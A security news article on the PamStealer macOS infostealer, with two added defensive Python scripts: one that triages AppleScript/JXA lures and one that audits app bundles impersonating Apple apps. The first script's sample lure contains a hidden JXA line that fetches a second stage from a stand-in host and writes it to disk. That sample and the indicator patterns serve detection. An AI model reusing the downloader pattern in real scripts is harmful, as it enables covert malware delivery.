Cybersecurity researchers have discovered a new macOS malware family, dubbed PamStealer, that uses a covert method to steal user credentials. The malware disguises itself as a legitimate Mac application and abuses built-in macOS components to capture a user's password, confirm that it is correct, and only then send it to an attacker-controlled server.
Researchers at Jamf said PamStealer combines several techniques that make it harder to detect than most existing macOS infostealers, and that it relies on custom-built components rather than the off-the-shelf tooling commonly seen in similar threats.
PamStealer is distributed as a disk image posing as Maccy, a well-known open-source clipboard manager for macOS. Instead of a normal app installation, the user is instructed to open the file and press Command-R. That is the Run shortcut in Script Editor, so the keystroke executes the script rather than installing anything.
The first stage is an AppleScript. Code hidden inside the script downloads the next stage using JavaScript for Automation (JXA) and native macOS APIs rather than spawning a separate download utility. According to the researchers, this leaves fewer of the process-execution artifacts that security tools normally watch for, which makes the download harder to detect.
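As an added example (not code from the article or from Jamf), the Python script below shows how a triage tool can flag the traits the article describes in a first stage of this kind: AppleScript that hands off to JXA, use of the ObjC bridge to fetch and write a file without a child process, and a payload hidden from view. The sample lure text, the indicator list, the weights and the "pushed off-screen by blank lines" heuristic are all constructed assumptions for illustration; the real PamStealer script's contents are not on the page.

```python
"""Static triage of a suspicious AppleScript / JXA lure (added example)."""
import re
from dataclasses import dataclass

# Indicators of a self-contained JXA downloader: (name, regex, weight).
# Constructed for this example; tune to your own telemetry.
INDICATORS = [
    ("jxa-embedded-in-applescript", re.compile(r'run script .*in "JavaScript"', re.I), 3),
    ("objc-bridge-import",          re.compile(r"ObjC\.import\("), 3),
    ("native-url-fetch",            re.compile(r"\$\.(NSURL\w*|NSData\.dataWithContentsOfURL)"), 4),
    ("native-file-write",           re.compile(r"writeToFileAtomically|writeToFile\("), 2),
    ("native-process-spawn",        re.compile(r"\$\.NSTask|NSWorkspace"), 2),
    ("shell-fallback",              re.compile(r"do shell script"), 1),
    ("base64-blob",                 re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"), 2),
]


@dataclass
class Finding:
    line: int        # 0 means a file-level finding
    indicator: str
    weight: int
    text: str


def triage(script_text: str, blank_run_threshold: int = 40) -> dict:
    """Score a script's text and return findings plus a verdict."""
    lines = script_text.splitlines()
    findings = []
    for n, line in enumerate(lines, 1):
        for name, rx, weight in INDICATORS:
            if rx.search(line):
                findings.append(Finding(n, name, weight, line.strip()[:60]))

    # Hidden-code heuristic (assumption): a long run of blank lines pushes the
    # real payload below what the Script Editor window shows at first glance.
    run = longest = 0
    for line in lines:
        run = run + 1 if not line.strip() else 0
        longest = max(longest, run)
    if longest >= blank_run_threshold:
        findings.append(Finding(0, "code-pushed-offscreen", 3,
                                f"{longest} consecutive blank lines"))

    score = sum(f.weight for f in findings)
    return {"score": score, "findings": findings,
            "verdict": "suspicious" if score >= 8 else "benign"}


# Constructed sample lure: a friendly header, a wall of blank lines, then the
# JXA stage that fetches and drops the next payload through the ObjC bridge.
SAMPLE_LURE = (
    "-- Maccy installer helper\n"
    "-- Press Command-R to install\n"
    'display dialog "Installing Maccy..." buttons {"OK"}\n'
    + "\n" * 60 +
    "\nset jxa to \"ObjC.import('Foundation'); "
    "var d = $.NSData.dataWithContentsOfURL($.NSURL.URLWithString('https://example.invalid/s2')); "
    "d.writeToFileAtomically('/tmp/.s2', true);\"\n"
    'run script jxa in "JavaScript"\n'
)

# Constructed benign script for comparison.
SAMPLE_BENIGN = (
    'tell application "Finder"\n'
    '    display dialog "Hello"\n'
    "end tell\n"
)

if __name__ == "__main__":
    for label, text in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        result = triage(text)
        print(f"{label}: {result['verdict']} (score {result['score']})")
        for f in result["findings"]:
            print(f"  line {f.line:>3}  {f.indicator:<30} {f.text}")
```

The scoring is deliberately coarse: any one of these constructs is legitimate on its own, but a script that embeds JXA, imports Foundation, fetches a URL and writes it to disk, all behind a screen of whitespace, has no honest reason to exist as an "installer".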
The second stage is written in Rust, a language rarely seen in macOS infostealers. It displays a fake password prompt styled after a genuine macOS authentication dialog, telling the user that Maccy needs permission to make changes. Rather than sending the typed password off to a server to be checked, PamStealer verifies it locally through macOS's Pluggable Authentication Modules (PAM) interface, calling into PAM from within its own process.
According to the researchers, this in-process check avoids spawning the extra processes that security tools typically monitor. If the password is wrong the prompt simply reappears, and it keeps reappearing until the correct one is entered, so the attacker only ever receives a credential that has already been confirmed as valid for the local account. After verification the user is shown a fake message saying the application is damaged and cannot be installed, which makes the episode look like an ordinary failed install and discourages further investigation.
PamStealer takes several steps to stay hidden once it is on a device. It installs itself inside fake app bundles named after macOS components such as Finder or Software Update, and it borrows the genuine system icons so the bundles look authentic at a glance.
The researchers also found that the malware delays its permission requests, such as the Full Disk Access prompt, for up to 40 minutes after infection, decoupling them in time from the initial installation so that analysts and detection logic are less likely to connect the two. It encrypts its communication with its remote servers, and it includes functions for accessing Ethereum-related data stored on the infected system.
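As an added example (not code from the article or from Jamf), the Python audit below checks app bundles for the impersonation signals described above: a bundle named after Finder or Software Update that lives outside Apple's own system locations, or one that claims a `com.apple.` bundle identifier from a third-party path. It relies only on `Info.plist` contents, so it runs anywhere Python runs; the demo bundles it builds in a temporary directory are constructed for illustration, and the trusted-path list, the impersonation name list and the "no `_CodeSignature` directory" check are assumptions of this example. On a real Mac the decisive check is `codesign -dv --verify` on each flagged bundle, which this script does not replace.

```python
"""Audit .app bundles for impersonation of Apple system apps (added example)."""
import os
import plistlib
import tempfile
from pathlib import Path

# Apple app names that malware is reported to impersonate (the two on the page
# plus a few obvious ones; extend as needed).
APPLE_APP_NAMES = {"Finder", "Software Update", "System Settings", "Installer", "Safari"}

# Locations where Apple-shipped bundles legitimately live. Location is only a
# coarse signal; a code-signature check is the real test on macOS.
SYSTEM_ROOTS = ("/System/", "/Applications/")


def read_info(bundle: Path) -> dict:
    """Return the bundle's Info.plist as a dict, or {} if it is missing."""
    info = bundle / "Contents" / "Info.plist"
    if not info.is_file():
        return {}
    with info.open("rb") as fh:
        return plistlib.load(fh)


def audit_bundle(bundle: Path, system_roots=SYSTEM_ROOTS) -> list[str]:
    """Return the impersonation signals found for one .app bundle."""
    info = read_info(bundle)
    name = info.get("CFBundleName") or bundle.stem
    display = info.get("CFBundleDisplayName", name)
    ident = info.get("CFBundleIdentifier", "")
    inside_system = any(str(bundle).startswith(root) for root in system_roots)

    flags = []
    if not inside_system:
        if {name, display, bundle.stem} & APPLE_APP_NAMES:
            flags.append("name-impersonation")
        if ident.startswith("com.apple."):
            flags.append("apple-identifier-outside-system-path")
    if not ident:
        flags.append("missing-bundle-identifier")
    if not (bundle / "Contents" / "_CodeSignature").is_dir():
        # Weak signal only: confirm with `codesign -dv --verify` on macOS.
        flags.append("no-code-signature-directory")
    return flags


def scan_tree(root: Path, system_roots=SYSTEM_ROOTS) -> dict[str, list[str]]:
    """Walk a directory tree and audit every .app bundle found in it."""
    results = {}
    for dirpath, dirnames, _ in os.walk(root):
        for d in list(dirnames):
            if d.endswith(".app"):
                bundle = Path(dirpath) / d
                results[str(bundle)] = audit_bundle(bundle, system_roots)
                dirnames.remove(d)  # do not descend into the bundle itself
    return results


def make_bundle(path: Path, info: dict, signed: bool = False) -> None:
    """Create a minimal constructed bundle skeleton for the demo."""
    (path / "Contents" / "MacOS").mkdir(parents=True)
    with (path / "Contents" / "Info.plist").open("wb") as fh:
        plistlib.dump(info, fh)
    if signed:
        (path / "Contents" / "_CodeSignature").mkdir()


def demo() -> dict[str, list[str]]:
    """Build constructed bundles under a temp root and audit them.

    The temp root stands in for '/', so the trusted roots are remapped to
    <root>/System/ and <root>/Applications/ for the demo.
    """
    root = Path(tempfile.mkdtemp(prefix="bundle-audit-"))
    # Genuine Finder lives at /System/Library/CoreServices/Finder.app.
    make_bundle(root / "System/Library/CoreServices/Finder.app",
                {"CFBundleName": "Finder", "CFBundleIdentifier": "com.apple.finder"}, signed=True)
    # Impostor: Finder's name and icon, third-party identifier, user-writable path.
    make_bundle(root / "Library/Application Support/Finder.app",
                {"CFBundleName": "Finder", "CFBundleIdentifier": "com.example.helper",
                 "CFBundleIconFile": "FinderIcon"})
    # Impostor that also spoofs an Apple bundle identifier.
    make_bundle(root / "Library/Application Support/Software Update.app",
                {"CFBundleName": "Software Update", "CFBundleIdentifier": "com.apple.SoftwareUpdate"})
    # Ordinary third-party app in /Applications.
    make_bundle(root / "Applications/Clippy.app",
                {"CFBundleName": "Clippy", "CFBundleIdentifier": "com.example.clippy"}, signed=True)

    roots = (str(root / "System") + "/", str(root / "Applications") + "/")
    results = scan_tree(root, roots)
    return {str(Path(p).relative_to(root)): flags for p, flags in results.items()}


if __name__ == "__main__":
    for bundle, flags in sorted(demo().items()):
        print(f"{bundle}: {flags or 'clean'}")
```

Run against a real system, `scan_tree(Path.home() / "Library")` and `scan_tree(Path("/Users/Shared"))` cover the user-writable locations where a dropped bundle would normally land; anything that comes back with `name-impersonation` deserves a look at its creation time, since the delayed permission prompt described above may be the first visible sign of it.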
The researchers note that PamStealer chains several techniques into a single attack: a Script Editor-based lure, a self-contained JXA downloader, a Rust payload, and local password verification through macOS's built-in PAM.
They also say the case reflects a broader trend in macOS malware, with attackers increasingly abusing built-in system features and quieter execution paths to avoid detection. The findings underline the need for caution when installing apps, even ones that appear legitimate, and in particular toward any "installer" that asks the user to run a script or to type a password into a dialog that the app itself produced rather than the standard macOS installer or system prompts.